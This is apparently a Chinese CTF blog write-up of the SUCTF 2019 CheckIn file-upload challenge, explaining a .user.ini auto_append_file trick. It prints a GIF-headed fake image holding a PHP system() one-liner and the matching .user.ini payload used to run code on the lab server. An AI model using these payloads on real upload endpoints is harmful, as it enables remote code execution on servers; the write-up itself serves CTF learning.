2021-02-09  /2021/02/09/SUCTF-2019-CheckIn/ 99+   2 分钟   0.3 k0次访问

SUCTF-2019-CheckIn

[SUCTF 2019]CheckIn

1.题目:文件上传利用.user.ini
2.过程:

em,这道题把前面的知识点基本上都概括了……但是文件后缀的检查一直无法绕过,学习了一波……

关于.user.ini文件的知识:

img

dalao的文章解释的很清楚

更加细化的说明

如果要用到.user.ini,特征之一就是在上传到.user.ini的文件夹下,也要有可执行的正常php文件。

image-20210209132326985

这道题的文件结构恰好是这样的(太恰好了……)

所以常规绕过上传一个jpg结尾的图片一句话木马,在上传.user.ini对图片包含在php文件中解析

1
2
GIF89a
<script language='php'>system('cat /flag'); 
1
2
3
GIF89a

auto_append_file=a.jpg

image-20210209132911616

访问时就自动执行查出flag

唉,用菜刀一直连不上去……

SUCTF-2019-CheckIn

http://example.com/2021/02/09/SUCTF-2019-CheckIn/

作者

inanb

发布于

2021-02-09

更新于

2021-08-23

许可协议

# 相关文章
  1.CISCN2019-华东南赛区-Double-Secret
  2.津门杯hate_php
  3.津门杯GoOSS
  4.蓝帽杯2021复现
  5.hacker101-2
  6.HarekazeCTF-2019-encode_and_encode
  7.NCTF2019-SQLi
  8.SWPUCTF-2018-SimplePHP
# 推荐文章
  1.Black-Watch-入群题-Web
  2.DDCTF-2019-homebrew event loop
  3.GYCTF2020-EasyThinking
  4.GXYCTF2019-BabysqliV3.0
  5.GYCTF2020-Easyphp
  6.HFCTF2020-JustEscape

喜欢这篇文章?打赏一下作者吧

关注我

:D 一言句子获取中...

链接

最新文章

分类

归档

标签

buuctf29
Buuctf5
PHP2
RCE2
php变量覆盖2
伪协议2
Buuctf PHP代码审计 文件包含1
Buuctf SQL1
Html和css1

订阅更新

×